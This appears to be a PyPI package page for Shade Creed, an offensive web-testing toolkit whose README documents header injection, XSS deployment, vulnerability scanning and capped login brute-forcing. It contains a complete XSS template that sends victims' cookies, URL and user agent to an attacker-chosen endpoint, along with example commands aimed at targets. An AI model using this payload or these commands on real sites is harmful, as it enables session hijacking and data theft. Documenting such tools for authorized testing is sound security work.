No project description provided
Project description
Shade Creed Toolkit
✨ Overview
Shade Creed is a command-line penetration testing toolkit designed for web application assessment. It provides tools to inject custom headers, deploy and test XSS payloads, and scan for common vulnerabilities. Built with modularity in mind, it allows you to dynamically customize and deploy payloads for real-world testing scenarios.
Version: 0.0.4 beta
Author: shade - Sherifdeen Adesola
Platform: Linux / Android & Cross platform compatible
✨ Features
- Custom HTTP/HTTPS header injection (supports multiple methods)
- Dynamic XSS payload creation and deployment
- Lightweight vulnerability scanner
- Quick bruteforce setup
- Proxy support (basic)
📦 Installation
pip install shadecreed
Additional package : cloudflared
Installation:
Android (termux)
pkg install cloudflared
Macos
brew install cloudflared
Windows
- Visit the official download page: 👉 https://developers.cloudflare.com/cloudflared/install-windows
- Download the latest cloudflared-windows-amd64.exe.
- Rename the downloaded file to cloudflared.exe.
- Move it to a folder like C:\cloudflared.
- Add that folder to your System PATH: Open System Properties > Environment Variables Under System variables, find and edit Path Add: C:\cloudflared\
- Verify installation: cloudflared --version
Linux distros
Download the latest cloudflared binary:
wget https://github.com/cloudflare/cloudflared/releases/latest/download/cloudflared-linux-amd64
Make it executable:
chmod +x cloudflared-linux-amd64
Move it to a directory in your system PATH:
sudo mv cloudflared-linux-amd64 /usr/local/bin/cloudflared
Verify installation:
cloudflared --version
⚙️ CLI Tools
1. shadecreed
Description:
Main entry point for the framework.
usage: shadecreed [-h] -u URL
Options:
-h,--helpShow help message and exit-u URL,--url URLTarget URL to launch framework-v,--versionDisplay version
2. shadecreed-inject
Description:
Injects custom headers into HTTP(S) requests.
usage: shadecreed-inject [-h] -u URL [-m {GET,POST,PUT,DELETE}] [-s HEADER] [-p PROXY] [-r REDIRECT]
Options:
-h,--helpShow help message and exit-u URL,--url URLTarget URL-m,--method{GET,POST,PUT,DELETE} HTTP method to use (default: GET)-s HEADER,--header HEADERPath to custom headers JSON-p PROXY,--proxy PROXYProxy in formathost:port-r REDIRECT,--redirect REDIRECTtrue - allow redirect otherwise do not provide this flag
3. shadecreed-xss
Description:
Customize and deploy XSS payloads to dynamic endpoints.
usage: shadecreed-xss [-h] --url URL [--script SCRIPT] [--endpoint ENDPOINT]
Options:
-h,--helpShow help message and exit--url URLTarget URL--script SCRIPTPath to XSS script template--endpoint ENDPOINTCustom receiving endpoint
4. shadecreed-scan
Description:
Scans a target for vulnerabilities.
usage: shadecreed-scan [-h] --url URL
Options:
-h,--helpShow help message and exit--url URLTarget URL
5. shadecreed-brute
Description:
Run custom brute force on admin login pages.
shadecreed-brute [-h] --url URL --redirect [true]
⚠️ Note: To prevent abuse, it can only attempt 10 passwords.
Options:
-h,--helpShow help message and exit-u,--urlTarget URL-r,--redirect[true] - if you intend to allow redirects otherwise, do not provide this flag.
📂 Example Commands
Run the main framework:
shadecreed -u https://example.com
Inject custom header using POST:
shadecreed-inject -u https://target.com/api -m POST -s headers.json -r true
Deploy custom XSS script:
shadecreed-xss --url https://target.com/page --script payload.js --endpoint https://mycustomendpoint.com/log
Test custom endpoint:
shadecreed-test <Custom_Endpoint>
Scan a site for vulnerabilities:
shadecreed-scan --url https://victim.com
Perform custom bruteforce:
shadecreed-brute --url https://myhome/admin --redirect true
🕷️ Custom XSS Template
You can craft custom XSS scripts using the {{endpoint}} placeholder which will be replaced during deployment:
<script>
var data = {
cookies: document.cookie,
location: window.location.href,
userAgent: navigator.userAgent
};
fetch("{{endpoint}}", {
method: "POST",
headers: { "Content-Type": "application/json" },
body: JSON.stringify(data)
});
</script>
Save the above as payload.js and pass it using the --script flag.
⚠️ Disclaimer
Shade Creed is built for educational and authorized security testing only. The developer is not responsible for any misuse or illegal activity.
Goodluck Pentesting! ✨
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
Source Distribution
Built Distribution
Filter files by name, interpreter, ABI, and platform.
If you're not sure about the file name format, learn more about wheel file names.
Copy a direct link to the current filters
File details
Details for the file shadecreed-0.0.4.tar.gz.
File metadata
- Download URL: shadecreed-0.0.4.tar.gz
- Upload date:
- Size: 33.9 kB
- Tags: Source
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/6.1.0 CPython/3.13.4
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
19f8295007893437834527d295201bd249ef596c719e99dc946666a979718419
|
|
| MD5 |
48650dedce2da6172750b1eea203f332
|
|
| BLAKE2b-256 |
7b74fcdcbbe01ee3ed37037b0ff8a9792875c874dbe4f3087684b18c28fe7409
|
File details
Details for the file shadecreed-0.0.4-py3-none-any.whl.
File metadata
- Download URL: shadecreed-0.0.4-py3-none-any.whl
- Upload date:
- Size: 37.5 kB
- Tags: Python 3
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/6.1.0 CPython/3.13.4
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
c9f8265bfff79928b89e6b0beebd6fc4ece380432f7442084ec1e5a3e9cf1b9b
|
|
| MD5 |
058bf0fd553a50bf1f929bf2f69ec637
|
|
| BLAKE2b-256 |
0f2b3214075957af1f4bc8ef31e97ce7af0258107d4819ab7eb399676bc7b2b4
|
